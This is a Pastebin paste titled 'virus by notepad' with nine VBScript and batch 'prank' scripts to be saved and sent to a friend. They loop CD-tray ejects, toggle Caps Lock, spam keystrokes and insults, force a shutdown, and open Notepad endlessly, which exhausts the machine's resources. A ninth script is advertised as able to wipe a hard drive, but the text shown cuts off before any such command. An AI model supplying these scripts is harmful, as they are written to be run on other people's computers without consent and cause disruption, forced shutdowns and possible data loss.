HackerPro536

virus by notepad- hvngroups.net

Aug 25th, 2016
341
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
  2. Type :
  3.  
  4. Set oWMP = CreateObject("WMPlayer.OCX.7")
  5. Set colCDROMs = oWMP.cdromCollection
  6. do
  7. if colCDROMs.Count >= 1 then
  8. For i = 0 to colCDROMs.Count - 1
  9. colCDROMs.Item(i).Eject
  10. Next
  11. For i = 0 to colCDROMs.Count - 1
  12. colCDROMs.Item(i).Eject
  13. Next
  14. End If
  15. wscript.sleep 5000
  16. loop
  17.  
  18. Save it as "Anything.VBS" and send it.
  19.  
  20.  
  21. 2) Toggle your friend's Caps Lock button simultaneously:
  22. Type :
  23.  
  24. Set wshShell =wscript.CreateObject("WScript.Shell")
  25. do
  26. wscript.sleep 100
  27. wshshell.sendkeys "{CAPSLOCK}"
  28. loop
  29.  
  30. Save it as "Anything.VBS" and send it.
  31.  
  32. 3) Convey your friend a lil' message and shut down his / her computer:
  33. Type :
  34.  
  35.  
  36.  
  37. @echo off
  38. msg * I don't like you
  39. shutdown -c "Error! You are too stupid!" -s
  40.  
  41. Save it as "Anything.BAT" in All Files and send it.
  42.  
  43. 4) Frustrate your friend by making this VBScript hit Enter simultaneously:
  44. Type :
  45.  
  46. Set wshShell = wscript.CreateObject("WScript.Shell")
  47. do
  48. wscript.sleep 100
  49. wshshell.sendkeys "~(enter)"
  50. loop
  51.  
  52. Save it as "Anything.VBS" and send it.
  53.  
  54. 5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
  55. Type :
  56.  
  57. WScript.Sleep 180000
  58. WScript.Sleep 10000
  59. Set WshShell = WScript.CreateObject("WScript.Shell")
  60. WshShell.Run "notepad"
  61. WScript.Sleep 100
  62. WshShell.AppActivate "Notepad"
  63. WScript.Sleep 500
  64. WshShell.SendKeys "Hel"
  65. WScript.Sleep 500
  66. WshShell.SendKeys "lo "
  67. WScript.Sleep 500
  68. WshShell.SendKeys ", ho"
  69. WScript.Sleep 500
  70. WshShell.SendKeys "w a"
  71. WScript.Sleep 500
  72. WshShell.SendKeys "re "
  73. WScript.Sleep 500
  74. WshShell.SendKeys "you"
  75. WScript.Sleep 500
  76. WshShell.SendKeys "? "
  77. WScript.Sleep 500
  78. WshShell.SendKeys "I a"
  79. WScript.Sleep 500
  80. WshShell.SendKeys "m g"
  81. WScript.Sleep 500
  82. WshShell.SendKeys "ood"
  83. WScript.Sleep 500
  84. WshShell.SendKeys " th"
  85. WScript.Sleep 500
  86. WshShell.SendKeys "ank"
  87. WScript.Sleep 500
  88. WshShell.SendKeys "s! "
  89.  
  90. Save it as "Anything.VBS" and send it.
  91.  
  92. 6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
  93. Type :
  94.  
  95. MsgBox "Let's go back a few steps"
  96. Set wshShell =wscript.CreateObject("WScript.Shell")
  97. do
  98. wscript.sleep 100
  99. wshshell.sendkeys "{bs}"
  100. loop
  101.  
  102. Save it as "Anything.VBS" and send it.
  103.  
  104. 7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
  105. Type :
  106.  
  107. Set wshShell = wscript.CreateObject("WScript.Shell")
  108. do
  109. wscript.sleep 100
  110. wshshell.sendkeys "You are a fool."
  111. loop
  112.  
  113. Save it as "Anything.VBS" and send it.
  114.  
  115. 8. Open Notepad continually in your friend's computer:
  116. Type :
  117.  
  118. @ECHO off
  119. :top
  120. START %SystemRoot%\system32\notepad.exe
  121. GOTO top
  122.  
  123. Save it as "Anything.BAT" and send it.
  124.  
  125. 9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
  126.  
  127. 1: Shutdown
  128. 2: Restart
  129. 3: Wipes out your hard drive (BEWARE)
  130. 4: Net send
  131. 5: Messages then shutdown
  132. Type :
  133. @echo off
  134. title The end of the world
  135. cd C:\
  136. :menu
  137. cls
  138. echo
  139.  
  140. Note that: I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc..
  141.  
  142. pause
  143. echo Pick your poison:
  144. echo 1. Die this way (Wimp)
  145. echo 2. Die this way (WIMP!)
  146. echo 3. DO NOT DIE THIS WAY
  147. echo 4. Die this way (you're boring)
  148. echo 5. Easy way out
  149. set input=nothing
  150. set /p input=Choice:
  151. if %input%==1 goto one
  152. if %input%==2 goto two
  153.  
  154. Save it as "Anything.BAT" and send it.
Advertisement
Add Comment
Please, Sign In to add comment